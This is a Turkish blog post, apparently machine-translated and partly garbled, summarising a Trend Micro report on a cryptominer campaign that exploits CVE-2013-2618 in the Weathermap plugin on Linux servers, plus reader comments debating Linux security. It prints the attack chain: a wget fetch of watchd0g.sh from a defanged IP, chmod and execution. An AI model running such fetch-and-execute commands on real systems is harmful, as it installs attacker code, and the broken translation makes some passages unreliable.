Bu kripto para madencisi uzak bilgisayarların kullanımıyla yetkisiz Bunların sahiplerinin oranı bir trend haline geliyor. Bu tür bir durumla ilgili olarak blogda birkaç kez bundan bahsetmiştim.
Ve bu, kripto para birimlerinin olduğu andan itibaren zaten tamamen kontrolden çıkmış olmasıdır. oldukça önemli bir yer ve değer aldı, güvenliklerini ihlal eden bilgisayarlara erişmek için yeterli bilgiye sahip kişiler, parasal bir fayda sağlamak için önemli bilgileri veya banka hesaplarını aramak için zaman kaybetmeyi bir kenara bıraktılar.
Bunu yapmak yerine, yapılacak en kolay şeyi tercih ediyorlar: Bu ekiplerin kontrolünü ele almak ve onları bir madencilik ağında ve ayrıca genellikle bir botnet ile yaptıkları diğer görevler için birleştirmek.
Bu şekilde sizi yeniden numaralandırmak genellikle daha fazladır. sadece bunun yarattığı anlık paraya odaklanıyorlar.
Piyasa trendlerinin akıllıca anlaşılması ve kripto ticareti hakkında doğru bilgi birikimi ile kişi büyük faydalar sağlayabilir.
Linux gerçekten güvenli bir sistem mi?
Birçoğumuz Linux'un neredeyse mükemmel bir güvenli işletim sistemi olduğu fikrine sahibiz, gerçek şu ki hala bazı kusurları var.
Peki varBazı günler TrendMicro bir keşif yaptı, içinde Reveló yeni bir Bilgisayar korsanlarına kripto para madenciliği avantajını veren Linux sistemlerindeki kusur Linux sunucuları ve makineleri kullanarak.
Blogunuz aracılığıyla bir açıklamada aşağıdakilere yorum yaptılar:
Olay yanıtıyla ilgili izlememiz aracılığıyla, göstergeleri JenkinsMiner kötü amaçlı yazılımını kullanan önceki bir kripto para birimi madenciliği kampanyasıyla ilişkilendirebildiğimiz izinsiz giriş girişimlerini gözlemledik.
Fark: Bu kampanya Linux sunucularını hedefliyor. Aynı zamanda, yaması yaklaşık beş yıldır mevcut olan, güncelliğini yitirmiş bir güvenlik açığından yararlanarak yeniden kullanılan güvenlik açıklarının klasik bir örneğidir.
Bu sürümde analiziniz aracılığıyla etkilenen siteleri belirlemeyi başardı bu başarısızlık için Esas olarak Japonya, Tayvan, Çin, ABD ve Hindistan'ı etkiler.
Saldırı analizi
Analiz yoluyla Trend Micro Smart Protection Network tarafından Saldırganların bu kusurdan nasıl yararlandığını biraz ayrıntılarıyla anlatın:
Bu kampanyanın operatörleri, sistem yöneticilerinin ağ aktivitesini görselleştirmek için kullandığı Camapi Network Weathermap eklentisindeki eski bir güvenlik açığı olan CVE-2013-2618'i kullanıyorlardı.
Neden eski bir güvenlik açığını istismar ettiklerine gelince: Ağ Hava Haritasının şimdiye kadar her ikisi de Haziran 2014'ten itibaren herkese açık olarak bildirilen yalnızca iki güvenlik açığı var.
Bu saldırganlar, yalnızca istismarın mevcut olduğu bir güvenlik açığından değil, aynı zamanda açık kaynak aracı kullanan kuruluşlarda oluşan yama gecikmesinden de yararlanıyor olabilir.
temel olarak saldırı bir XSS saldırısı yoluyla gerçekleşiyor:
Bulanık kısım, portu olan bir web sunucusu olan saldırı hedefidir.
dosya /plugins/weathermap/configs/conn.php kalıcı XSS saldırısından kaynaklanan dosya / plugins / weathermap / php .
Artı bağlantı.php Başlangıçta, benzer bir HTTP isteğinin 'adlı bir sayfaya uygulandığını görüyoruz. cools.php '.
Kripto para madenciliği programı güvenlik açığı aracılığıyla dağıtılır PHP hava durumu haritasından Linux sunucuları olan hedeflere
Görselde saldırının nasıl oluştuğunu görebilirsiniz ve şu şekilde anlatılmıştır:
wget watchd0g.sh hxxp: // 222 [.] 184 [.]] 79 [.] 11: 5317 / watchd0g [.] sh
Yaptığı şey, hemen hemen tüm Linux dağıtımlarının varsayılan olarak yüklediği bir yardımcı program olan wget ile bir dosyayı indirmek için gösterge göndermektir.
chmod 775 watchd0g.sh
dosyayı çalıştırılabilir yapar
./watchd0g.sh
Nihayetinde yaptığı şey, dosyanın sunucuda çalışmasını sağlamaktır.
Neyse ki, zaten bir yama var ( CVE-2013-2618 ) arıza için kullanılabilir ve İndirebilirsin itibaren Bu linki.
Si onun hakkında daha fazlasını bilmek istiyorsun bu başarısızlıktan bu bağlantıyı ziyaret edebilirsiniz.
kaynak: PHP Weathermap Güvenlik Açığı ile Dağıtılan Cryptocurrency Miner, Linux Sunucularını Hedefliyor
Aptal olmak güvenli değildir ve buna rağmen Linux sizi kurtarır.
Güvenlik yamalarını güncellememek Linux'un hatası değildir. Bazı şirketlerin para biriktirmesi, aptalları sistem yöneticisi olarak işe alması suçu.
Ama öyle olsa bile, HEMEN TESPİT EDİLİR ve hemen çözülür, bunun gibi küçük bir güvenlik olayı bile yayınlanır.
Ve Linux'un güncellemelerinin uygulanmamasıyla ilgili hangi hatası var? GNU / Linux geliştiricileri, ortaya çıkan güvenlik açıklarına çözümler geliştirerek ve bunları kullanıcılara sunarak işlerini yaparlar. Doktor bir grip aşısı yazarsa ve siz almazsanız, hastalanırsınız ve sertleşirsiniz… bu doktorun hatası mı?
DesdeLinux Eskisi gibi değil, iki önemli hatanın olduğu üst üste iki haber:
1.- Daha iyi editörler geliştirmeleri için özgür yazılım olmayan bir yazılım koyarlar ve olanları unuturlar (yorumlarda alıntılanmıştır).
2.- Yalnızca GÜNCELLENMEMİŞ sunucuları etkiledikleri zaman virüsler hakkında muazzam haberler. Ancak herhangi bir linux varsayılan olarak onlarca yıldır güncellendiyse. Windows tarzı emici bir antivirüs gerekliymiş gibi korkutmak için. Görünüşe göre Linux'un Windows ile aynı olduğunu ve aynı olmadığını söylemeye çalışıyorlar.
Bir hata eskiyse ve zaten yamalanmışsa, bu ne haber ne de hiçbir şeydir. Microsoft ve Trend Micro, Norton, Panda veya McAffee gibi antivirüs şirketlerini oynamayın veya para almayın.
Bu arada, şirkette birkaç yıldır Trend Micro kullanıyorduk ve bu gerçek bir patatesti, boktan bir şeydi, çünkü sistemi yürütülebilir bir dosyanın virüs "izleri" olduğunu söylüyordu değil) ve neden kaldırdığı (çalışmaması için bir dizine götürdü) kullanımına izin vermedi ve kullanmamız gereken güvenli bir yürütülebilir dosya ile bu davranışın engelini kaldırmak için herhangi bir beyaz liste yoktu . Kahretsin. Kurumsal versiyondu, bireysel versiyon bu beyaz liste imkanına sahipti. Acınası.
Kendinizi bu kadar zarif bir şekilde tarif etmeyin.
Makale, bir programa girmenize, onu yürütülebilir hale getirmenize ve çalıştırmanıza izin veren bir güvenlik açıklığından bahsediyor; bu, her virüsün yayması gereken güvenlik açığıdır, açıkçası, girilen programın kodunda bulunması gereken bir virüs olması gerekir. işlemi tekrarlamak ve kendi kendine kopyalama yapmak için ağdaki bilgisayarları tarama imkanı. Bunu tam olarak yapmazlar çünkü Linux'ta keşfedilen güvenlik açıkları bir güvenlik yamasıyla kaplıdır ve bu, Windows ile Linux arasındaki farktan kastım, çünkü bir antivirüs gerekli değil, deliği kapatmak içindir. Windows'ta birkaç nedenden dolayı daha zordur: 1.- Dosyalar, yalnızca uzantılarına göre yürütülebilir hale gelebilir ve etkilenen bilgisayara girişleri için bir adımı ortadan kaldırabilir. 2.- Kullanıcılar, tescilli olduklarından ve bunları ücret ödemeden almaları gerektiğinden şüpheli kaynaklı programları sürekli olarak yüklüyorlar (Bir ev ekonomisi için MS Office, Photoshop, ... satın almanın iki katından daha fazla bilgisayar ekipmanının maliyeti). 3.- Windows er ya da geç bozulur, kullanıcı zaman kaybetmemek için her şeyi biçimlendiren ve güncellenmemiş veya yamanın olduğu bir etkinleştirme yamasıyla nihai Windows'u yükleyen komşuya, arkadaşına götürür. kendisi bir casus programı koyar. Olmayabilir ve harika olabilir, ancak bu olabilir ve şifrelerinizi gözetleyen bir Windows'unuz olabilir. Makalede, güvenlik açığından etkilenen bir linux'daki tanıtım sisteminden bahsediyorlar, ağı otomatik olarak tarayan ve kendisini kopyalamak ve sunucu üzerinde çalıştırmak için kullanan programı yapmak, hepsinin en kolay kısmı, bu nedenle makalede yorum yapılan herhangi bir virüs için en önemli adımdır: sistemin saldırıya açıklığını bilmek.
Kötü bilgi. Bu Linux'ta bir hata değil, bir PHP UYGULAMASINDA bir hatadır, yani çoklu platformdur. Linux çekirdeğini çalıştıran sistemlere özel bile değildir! Ancak uygulama çapraz platform olmasa bile, bir Linux hatası olmaz, yalnızca bir uygulama olur.
Linux çekirdeği, bunun gibi siteler arası betikleme saldırılarına karşı korumada en ufak bir müdahaleye sahip değildir. Göndermeden önce en azından BEŞ DAKİKA araştırın, çünkü gerçek şu ki, bir şey hakkında biraz bilgisi olan birine kötü görüneceksiniz.